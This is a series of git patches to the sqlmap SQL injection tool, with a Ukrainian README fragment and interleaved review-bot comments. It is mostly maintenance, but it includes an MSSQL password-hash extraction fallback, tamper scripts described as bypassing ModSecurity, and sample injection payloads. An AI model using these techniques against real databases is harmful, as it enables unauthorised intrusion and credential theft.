+ +Найкраще завантажити sqlmap шляхом клонування [Git](https://github.com/sqlmapproject/sqlmap) репозиторію: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap «працює з коробки» з [Python](http://www.python.org/download/) версії **2.6.x** та **2.7.x** на будь-якій платформі. + +Використання +---- + +Щоб отримати список основних опцій і перемикачів, використовуйте: + + python sqlmap.py -h + +Щоб отримати список всіх опцій і перемикачів, використовуйте: + + python sqlmap.py -hh + +Ви можете знайти приклад виконання [тут](https://asciinema.org/a/46601). +Для того, щоб ознайомитися з можливостями sqlmap, списком підтримуваних функцій та описом всіх параметрів і перемикачів, а також прикладами, вам рекомендується скористатися [інструкцією користувача](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Посилання +---- + +* Основний сайт: http://sqlmap.org +* Завантаження: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) або [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Канал новин RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Відстеження проблем: https://github.com/sqlmapproject/sqlmap/issues +* Інструкція користувача: https://github.com/sqlmapproject/sqlmap/wiki +* Поширенні питання (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Скриншоти: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots From 63cca82288c37abe7ce599340f1c5a065810d5a6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 23 Dec 2018 09:57:50 +0100 Subject: [PATCH 411/428] Fixes #3415 --- lib/core/settings.py | 2 +- lib/utils/sqlalchemy.py | 3 +++ txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c7291655a01..5e1f884f56e 100644 
--- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.36" +VERSION = "1.2.12.37" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py index 4315cf7d033..928bdeda9bd 100644 --- a/lib/utils/sqlalchemy.py +++ b/lib/utils/sqlalchemy.py @@ -32,6 +32,7 @@ from lib.core.data import logger from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapFilePathException +from lib.core.exception import SqlmapMissingDependence from plugins.generic.connector import Connector as GenericConnector class SQLAlchemy(GenericConnector): @@ -79,6 +80,8 @@ def connect(self): raise SqlmapConnectionException("SQLAlchemy connection issue ('%s')" % msg[0]) self.printConnected() + else: + raise SqlmapMissingDependence("SQLAlchemy not available") def fetchall(self): try: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fc51b650672..f6b0bae358f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3afa2b42741332ce14a8c98befcfdff7 lib/core/settings.py +29c9671c1f1e13c08b857885fffcbfd0 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py 
@@ -115,7 +115,7 @@ eb2aa3fa9ebdf4cb6ac3e005f7df1e9b lib/utils/hash.py 683c3bd05b6164f56a57ed495c162684 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py -571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py +cede46255b3c8f8d0b425b1c72cac75a lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py 4703ceeb32131a9a7a6561575644123b lib/utils/versioncheck.py e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py From 37de01e99372dc9616febdc33679b6372de8d8f9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 23 Dec 2018 10:18:27 +0100 Subject: [PATCH 412/428] Fixes #3417 --- lib/core/settings.py | 2 +- lib/request/connect.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5e1f884f56e..8756afde235 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.37" +VERSION = "1.2.12.38" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index f5f3642fe4c..bbf98ced65b 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py 
@@ -963,11 +963,11 @@ def _adjustParameter(paramString, parameter, newValue): retVal = paramString match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString, re.I) if match: - retVal = re.sub(re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString, flags=re.I) + retVal = re.sub("(?i)%s" % re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString) else: match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString, re.I) if match: - retVal = re.sub(re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString, flags=re.I) + retVal = re.sub("(?i)%s" % re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString) return retVal token = AttribDict() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f6b0bae358f..611162970d7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -29c9671c1f1e13c08b857885fffcbfd0 lib/core/settings.py +6487983b44e37792b7b5a1581ca943c7 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -7ec820ec27161208a8411d81ec48161a lib/request/connect.py +999f9b050ffe9e9b7ddbc9fdb0a18432 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py 
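Review bot: The two `re.sub` calls in _adjustParameter are now inconsistent about escaping the replacement: the first branch wraps its replacement in `.replace('\\', r'\\')`, but the second passes `"%s%s" % (match.group(1), newValue)` raw, so a backslash in newValue is interpreted by re.sub as a backreference or escape sequence (an invalid one raises). Apply the same escaping in the second branch, `("%s%s" % (match.group(1), newValue)).replace('\\', r'\\')`. Moving re.I into an inline `(?i)` is fine since the pattern is re.escape'd, but re.sub still replaces every occurrence of the matched text rather than only the one found by re.search — pre-existing, and worth a short comment. The def line of _adjustParameter is the hunk header context, so the signature sits just outside the hunk.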
From 6ce0350abc9d0b435358b2dd3c7519a3dcc20eac Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 26 Dec 2018 22:12:13 +0100 Subject: [PATCH 413/428] Fixes #3420 --- lib/core/settings.py | 2 +- lib/request/basic.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 8756afde235..34cfd8ea68d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.38" +VERSION = "1.2.12.39" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/basic.py b/lib/request/basic.py index 9dd83434323..f60ead067cd 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -342,7 +342,7 @@ def _(match): retVal = match.group(0) try: retVal = unichr(int(match.group(1))) - except ValueError: + except (ValueError, OverflowError): pass return retVal page = re.sub(r"&#(\d+);", _, page) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 611162970d7..50d6d47f8ec 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6487983b44e37792b7b5a1581ca943c7 lib/core/settings.py +9a25febb08854816a83ee455005b865d lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py 
@@ -69,7 +69,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -2b81435f5a7519298c15c724e3194a0d lib/request/basic.py +67c035eda3066b44c592b2f602e44b3e lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py 999f9b050ffe9e9b7ddbc9fdb0a18432 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py From ddee027afbc9229d20fdb5d585d2d8ec82d7e28f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 26 Dec 2018 23:23:49 +0100 Subject: [PATCH 414/428] Minor message update --- lib/core/settings.py | 2 +- lib/request/connect.py | 8 +++++--- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 34cfd8ea68d..30de22c11d5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.39" +VERSION = "1.2.12.40" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index bbf98ced65b..967c5916291 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py 
@@ -174,9 +174,11 @@ def _retryProxy(**kwargs): warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')" else: warnMsg = "if the problem persists please check that the provided " - warnMsg += "target URL is valid. In case that it is, you can try to rerun " - warnMsg += "with the switch '--random-agent' turned on " - warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)" + warnMsg += "target URL is reachable. In case that it is, " + warnMsg += "you can try to rerun with " + if not conf.randomAgent: + warnMsg += "switch '--random-agent' and/or " + warnMsg += "proxy switches ('--ignore-proxy', '--proxy',...)" singleTimeWarnMessage(warnMsg) elif conf.threads > 1: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 50d6d47f8ec..e96e0f067a6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9a25febb08854816a83ee455005b865d lib/core/settings.py +03f706e4caefe69887515d9e7cb56748 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 67c035eda3066b44c592b2f602e44b3e lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -999f9b050ffe9e9b7ddbc9fdb0a18432 lib/request/connect.py +bd5e2ad9dd0505bdaae180b323a8fa34 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From de0df99d8e4585799af4e867ba3011a78e2448e5 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Fri, 28 Dec 2018 00:41:48 +0100 Subject: [PATCH 415/428] Update regarding #3418 (fallback for MsSQL's --passwords) --- lib/core/settings.py | 2 +- plugins/generic/users.py | 15 +++++++++++++++ txt/checksum.md5 | 4 ++-- 3 files changed, 18 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 30de22c11d5..0db32382371 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.40" +VERSION = "1.2.12.41" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/users.py b/plugins/generic/users.py index 742a8ec5c66..cbb2fa7917d 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py @@ -201,6 +201,9 @@ def getPasswordHashes(self): else: values = inject.getValue(query, blind=False, time=False) + if isNoneValue(values) and Backend.isDbms(DBMS.MSSQL): + values = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), blind=False, time=False) + for user, password in filterPairValues(values): if not user or user == " ": continue @@ -213,6 +216,8 @@ def getPasswordHashes(self): kb.data.cachedUsersPasswords[user].append(password) if not kb.data.cachedUsersPasswords and isInferenceAvailable() and not conf.direct: + fallback = False + if not len(users): users = self.getUsers() 
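Review bot: The MSSQL fallback rewrites the query with the literal pair `query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr")` three times across this hunk and the two that follow (`@@ -263` and `@@ -283`); hoisting the two function names into one module-level constant pair or a small `_mssqlHashFallback(query)` helper keeps them from drifting apart. The `fallback` flag is initialised once before the per-user work and only ever set to True inside the later hunks, so if that code runs per user, the first user whose count fails appears to switch every following user to the fallback query as well; resetting it at the top of each iteration would avoid that, if the sticky behaviour is not intended. getPasswordHashes starts before the hunk and continues after it.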
@@ -263,6 +268,10 @@ def getPasswordHashes(self): count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if not isNumPosStrValue(count) and Backend.isDbms(DBMS.MSSQL): + fallback = True + count = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of password " warnMsg += "hashes for user '%s'" % user @@ -283,10 +292,16 @@ def getPasswordHashes(self): query = rootQuery.blind.query2 % (user, index, user) else: query = rootQuery.blind.query % (user, index, user) + + if fallback: + query = query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr") + elif Backend.isDbms(DBMS.INFORMIX): query = rootQuery.blind.query % (user,) + elif Backend.isDbms(DBMS.HSQLDB): query = rootQuery.blind.query % (index, user) + else: query = rootQuery.blind.query % (user, index) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e96e0f067a6..050d29f933e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -03f706e4caefe69887515d9e7cb56748 lib/core/settings.py +eb8b62b1dc94be51a6c3d44d47af8f4a lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py 
@@ -223,7 +223,7 @@ f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py 30b421f06dc98998ddc1923a9048b7fc plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py f990d799e578dfbc3cde5728655a7854 plugins/generic/takeover.py -1265241e309da72bb82c3863a4c1b4bd plugins/generic/users.py +8ab0b84fda105459913715b98e1b8a4a plugins/generic/users.py 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ 158bfa168128393dde8d6ed11fe9a1b8 shell/backdoors/backdoor.aspx_ From 83972d405fe70ff40f562b59f7bf3e51e94d1164 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 28 Dec 2018 17:54:58 +0100 Subject: [PATCH 416/428] Trivial text update --- .github/ISSUE_TEMPLATE.md | 2 +- lib/core/settings.py | 2 +- sqlmap.conf | 6 +++--- tamper/modsecurityversioned.py | 2 +- tamper/modsecurityzeroversioned.py | 2 +- txt/checksum.md5 | 6 +++--- 6 files changed, 10 insertions(+), 10 deletions(-) diff --git a/.github/ISSUE_TEMPLATE.md b/.github/ISSUE_TEMPLATE.md index 062912bd61c..cf4ea5111ad 100644 --- a/.github/ISSUE_TEMPLATE.md +++ b/.github/ISSUE_TEMPLATE.md @@ -19,7 +19,7 @@ * Client OS (e.g. `Microsoft Windows 10`) * Program version (`python sqlmap.py --version` or `sqlmap --version` depending on installation): * Target DBMS (e.g. `Microsoft SQL Server`): -* Detected WAF/IDS/IPS protection (e.g. `ModSecurity` or `unknown`): +* Detected WAF/IPS protection (e.g. `ModSecurity` or `unknown`): * SQLi techniques found by sqlmap (e.g. `error-based` and `boolean-based blind`): * Results of manual target assessment (e.g. found that the payload `query=test' AND 4113 IN ((SELECT 'foobar'))-- qKLV` works): * Relevant console output (if any): diff --git a/lib/core/settings.py b/lib/core/settings.py index 0db32382371..4b7d67dc94b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.41" +VERSION = "1.2.12.42" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.conf b/sqlmap.conf index 5dfc3d72d01..88bcd002c9d 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -753,7 +753,7 @@ answers = # Valid: True or False beep = False -# Offline WAF/IPS/IDS payload detection testing. +# Offline WAF/IPS payload detection testing. # Valid: True or False checkPayload = False @@ -774,7 +774,7 @@ disableColoring = False # Default: 1 googlePage = 1 -# Make a thorough testing for a WAF/IPS/IDS protection. +# Make a thorough testing for a WAF/IPS protection. # Valid: True or False identifyWaf = False @@ -790,7 +790,7 @@ mobile = False # Valid: True or False offline = False -# Skip heuristic detection of WAF/IPS/IDS protection. +# Skip heuristic detection of WAF/IPS protection. # Valid: True or False skipWaf = False diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py index 0f8435598f6..7a6c6569724 100644 --- a/tamper/modsecurityversioned.py +++ b/tamper/modsecurityversioned.py @@ -28,7 +28,7 @@ def tamper(payload, **kwargs): * MySQL 5.0 Notes: - * Useful to bypass ModSecurity WAF/IDS + * Useful to bypass ModSecurity WAF >>> import random >>> random.seed(0) diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py index cb54fc8ff47..f87b8a098b9 100644 --- a/tamper/modsecurityzeroversioned.py +++ b/tamper/modsecurityzeroversioned.py @@ -27,7 +27,7 @@ def tamper(payload, **kwargs): * MySQL 5.0 Notes: - * Useful to bypass ModSecurity WAF/IDS + * Useful to bypass ModSecurity WAF >>> tamper('1 AND 2>1--') '1 /*!00000AND 2>1*/--' 
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 050d29f933e..8540c7d5ab3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -eb8b62b1dc94be51a6c3d44d47af8f4a lib/core/settings.py +6781c2fdbfdac0ec5388ca9f06b89b64 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -262,8 +262,8 @@ ef0639557a79e57b06296c4bc223ebef tamper/htmlencode.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py 40d1ea0796fd91cb3cdd602e36daed15 tamper/lowercase.py a54b361da0ac6988d0b97bc79463615d tamper/luanginx.py -1c4d622d1c2c77fc3db1f8b3849467ee tamper/modsecurityversioned.py -f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py +82b85a9325ffc22a9fe4003e12c5bc4a tamper/modsecurityversioned.py +0e0f17db797e61f778141a804ab6cd0d tamper/modsecurityzeroversioned.py 91b63afdb96b1d51c12a14cbd425d310 tamper/multiplespaces.py dcf3458f9010ca41bc4b56804f15792c tamper/overlongutf8more.py a3a3cef042b864c4226b63f89548f939 tamper/overlongutf8.py From 8092551fa9c0dc8c78cf6051add564300a9146a7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 28 Dec 2018 18:22:44 +0100 Subject: [PATCH 417/428] Minor refactoring --- lib/core/common.py | 22 +++++++++++----------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 14 insertions(+), 14 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 6291297c77b..502e60fca36 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
@@ -2121,6 +2121,16 @@ def readXmlFile(xmlFile): return retVal +def average(values): + """ + Computes the arithmetic mean of a list of numbers. + + >>> average([0.9, 0.9, 0.9, 1.0, 0.8, 0.9]) + 0.9 + """ + + return (sum(values) / len(values)) if values else None + @cachedmethod def stdev(values): """ @@ -2135,19 +2145,9 @@ def stdev(values): return None else: avg = average(values) - _ = reduce(lambda x, y: x + pow((y or 0) - avg, 2), values, 0.0) + _ = 1.0 * sum(pow((_ or 0) - avg, 2) for _ in values) return sqrt(_ / (len(values) - 1)) -def average(values): - """ - Computes the arithmetic mean of a list of numbers. - - >>> average([0.9, 0.9, 0.9, 1.0, 0.8, 0.9]) - 0.9 - """ - - return (sum(values) / len(values)) if values else None - def calculateDeltaSeconds(start): """ Returns elapsed time from start till now diff --git a/lib/core/settings.py b/lib/core/settings.py index 4b7d67dc94b..2aea222710e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.42" +VERSION = "1.2.12.43" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8540c7d5ab3..330e65059de 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
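Review bot: `average` is moved but keeps `sum(values) / len(values)`, which truncates for a list of ints under Python 2 (this tree still uses `print` statements, so that is the interpreter in play): `average([1, 2])` returns `1`, and the refactored `stdev` below then squares deviations from a truncated mean while its own `1.0 *` only guards the final division. Write it as `return (1.0 * sum(values) / len(values)) if values else None`; the existing float doctest keeps passing. A second doctest, `>>> average([1, 2])` giving `1.5`, would pin the fix.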
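Review bot: The rewritten line reuses `_` both as the result variable and as the generator's loop variable, `_ = 1.0 * sum(pow((_ or 0) - avg, 2) for _ in values)`, which reads as though the inner `_` shadowed the outer; a named total is clearer: `total = 1.0 * sum(pow((v or 0) - avg, 2) for v in values)` then `return sqrt(total / (len(values) - 1))`. Note also that `(_ or 0)` tolerates `None` entries here, while the `average(values)` call just above would already have raised `TypeError` on a `None` element, so the `or 0` is dead unless `average` is meant to filter them too. stdev's docstring and length guard start above this hunk.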
@@ -29,7 +29,7 @@ d4582467b0735525d8d8bdc0396ec87f lib/controller/checks.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e62309b22a59e60b270e62586f169441 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -22eb6444f89ef013cd256c92771cff5a lib/core/common.py +7272b591e710224c578071381e28c6c5 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6781c2fdbfdac0ec5388ca9f06b89b64 lib/core/settings.py +2e1f9bb9dce79f8681b8e1c83591d346 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From a569f21ad721aa6613b62d4e7a35aaf6f8c0fc1a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 28 Dec 2018 18:25:56 +0100 Subject: [PATCH 418/428] Bug fix (--smoke hasn't tested wrapped functions) --- lib/core/decorators.py | 7 +++++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 10 insertions(+), 3 deletions(-) diff --git a/lib/core/decorators.py b/lib/core/decorators.py index 0dfdbdaa3ec..ae3635ca603 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -5,6 +5,7 @@ See the file 'LICENSE' for copying permission """ +import functools import hashlib from lib.core.threads import getCurrentThreadData @@ -16,6 +17,7 @@ def cachedmethod(f, cache={}): Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/ """ + @functools.wraps(f) def _(*args, **kwargs): key = int(hashlib.md5("|".join(str(_) for _ in (f, args, kwargs))).hexdigest(), 16) & 0x7fffffffffffffff if key not in cache: 
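Review bot: The module-level `cache={}` that the newly `functools.wraps`-ed wrapper writes into is shared by every cached function and never bounded, and the key is `md5` over `str()` of the arguments, so objects without a value-based `__repr__` key by address and create a fresh entry per instance. Worth at least a cap before the insert, `if len(cache) > _CACHE_LIMIT: cache.clear()`, and a docstring caveat: `# NOTE: arguments are keyed by str(); only use on functions whose args have value-based reprs`. The wrapper body continues past the end of the hunk.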
